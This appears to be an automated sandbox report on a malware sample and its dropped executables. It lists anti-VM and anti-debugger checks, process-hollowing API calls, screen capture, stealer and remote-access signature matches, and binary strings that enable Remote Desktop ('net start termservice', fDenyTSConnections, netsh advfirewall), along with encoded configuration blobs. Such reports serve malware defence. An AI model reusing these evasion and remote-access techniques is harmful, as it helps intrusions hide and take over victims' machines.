                          Source: C:\ProgramData\giab\fvvb.exe | Last function: Thread delayed
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0009F011 FindFirstFileExW,0_2_0009F011
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0044F011 FindFirstFileExW,1_2_0044F011
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0044F011 FindFirstFileExW,3_2_0044F011
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_000693D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_000693D0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 360000
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 360000
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Thread delayed: delay time: 60000
                          Source: C:\ProgramData\giab\fvvb.exe | Thread delayed: delay time: 60000
                          Source: cubrodriver.exe, cubrodriver.exe, 00000005.00000002.1446089309.000000000058F000.00000040.00000001.01000000.0000000A.sdmp, fvvb.exe, fvvb.exe, 00000006.00000002.3779328273.000000000058F000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                          Source: fvvb.exe, 00000006.00000002.3780677288.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                          Source: cubrodriver.exe, cubrodriver.exe, 00000005.00000002.1446089309.000000000058F000.00000040.00000001.01000000.0000000A.sdmp, fvvb.exe, fvvb.exe, 00000006.00000002.3779328273.000000000058F000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | System information queried: ModuleInformation
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Process information queried: ProcessInformation

                          Anti Debugging

                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Thread information set: HideFromDebugger
                          Source: C:\ProgramData\giab\fvvb.exe | Thread information set: HideFromDebugger
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: regmonclass
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: gbdyllo
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: procmon_window_class
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: ollydbg
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: filemonclass
                          Source: C:\ProgramData\giab\fvvb.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\giab\fvvb.exe | File opened: NTICE
                          Source: C:\ProgramData\giab\fvvb.exe | File opened: SICE
                          Source: C:\ProgramData\giab\fvvb.exe | File opened: SIWVID
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Process queried: DebugPort
                          Source: C:\ProgramData\giab\fvvb.exe | Process queried: DebugPort
                          Source: C:\ProgramData\giab\fvvb.exe | Process queried: DebugPort
                          Source: C:\ProgramData\giab\fvvb.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Code function: 5_2_04920C2D rdtsc 5_2_04920C2D
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008A245
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_00096092 mov eax, dword ptr fs:[00000030h] 0_2_00096092
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008DC00 mov eax, dword ptr fs:[00000030h] 0_2_0008DC00
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_00446092 mov eax, dword ptr fs:[00000030h] 1_2_00446092
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0043DC00 mov eax, dword ptr fs:[00000030h] 1_2_0043DC00
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_00446092 mov eax, dword ptr fs:[00000030h] 3_2_00446092
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0043DC00 mov eax, dword ptr fs:[00000030h] 3_2_0043DC00
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_000A0592 GetProcessHeap,0_2_000A0592
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008A245
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008A3A8 SetUnhandledExceptionFilter,0_2_0008A3A8
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008EC0D
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0008995A
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0043A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A245
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0043A3A8 SetUnhandledExceptionFilter,1_2_0043A3A8
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0043EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043EC0D
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0043995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0043995A
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0043A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043A245
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0043A3A8 SetUnhandledExceptionFilter,3_2_0043A3A8
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0043EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043EC0D
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0043995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0043995A

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_00068070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_00068070
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe"
                          Source: cubrodriver.exe, cubrodriver.exe, 00000005.00000002.1446089309.000000000058F000.00000040.00000001.01000000.0000000A.sdmp, fvvb.exe, fvvb.exe, 00000006.00000002.3779328273.000000000058F000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: z}Program Manager
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008A42F cpuid 0_2_0008A42F
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: EnumSystemLocalesW,0_2_000A2168
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: EnumSystemLocalesW,0_2_000A21B3
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: EnumSystemLocalesW,0_2_000A224E
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: EnumSystemLocalesW,0_2_0009825C
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_000A22D9
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetLocaleInfoW,0_2_000A252C
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_000A2652
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetLocaleInfoW,0_2_000A2758
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetLocaleInfoW,0_2_0009877E
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_000A2827
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_000A1EC6
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,1_2_004520C1
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,1_2_00452168
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,1_2_004521B3
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,1_2_0045224E
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,1_2_0044825C
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_004522D9
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,1_2_0045252C
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00452652
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,1_2_00452758
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,1_2_0044877E
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00452827
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00451EC6
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,3_2_00452168
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,3_2_004521B3
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,3_2_0045224E
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,3_2_0044825C
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_004522D9
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,3_2_0045252C
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00452652
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,3_2_00452758
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,3_2_0044877E
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452827
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451EC6
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Queries volume information: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Queries volume information: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe VolumeInformation
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0008A655 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0008A655
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_000661F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,0_2_000661F0
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0009E72E _free,_free,_free,GetTimeZoneInformation,_free,0_2_0009E72E
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_000693D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_000693D0

                          Stealing of Sensitive Information

                          Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara match | File source: Fp80Ocyhqm.exe, type: SAMPLE
                          Source: Yara match | File source: 4.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 3.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 13.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 13.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 9.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 12.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 12.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 4.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 9.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.Fp80Ocyhqm.exe.60000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 3.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.Fp80Ocyhqm.exe.60000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 14.2.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 14.0.Gxtuum.exe.410000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe, type: DROPPED
                          Source: Yara match | File source: 00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000003.1433439906.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cubrodriver.exe PID: 7764, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: fvvb.exe PID: 7904, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara matchFile source: 00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000003.1433439906.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cubrodriver.exe PID: 7764, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: fvvb.exe PID: 7904, type: MEMORYSTR
                          Source: Fp80Ocyhqm.exeString found in binary or memory: net start termservice
                          Source: Fp80Ocyhqm.exe, 00000000.00000003.1302021933.0000000006C11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                          Source: Fp80Ocyhqm.exe, 00000000.00000003.1302021933.0000000006C11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Fp80Ocyhqm.exe, 00000000.00000000.1296939095.00000000000B1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                          Source: Fp80Ocyhqm.exe, 00000000.00000002.1305562178.00000000000B1000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exeString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000001.00000002.3779325935.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000001.00000000.1304853038.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exeString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000003.00000000.1310657430.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000003.00000002.1313337704.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000004.00000000.1369513258.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000004.00000002.1371432716.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000009.00000002.1961556613.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000009.00000002.1961556613.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
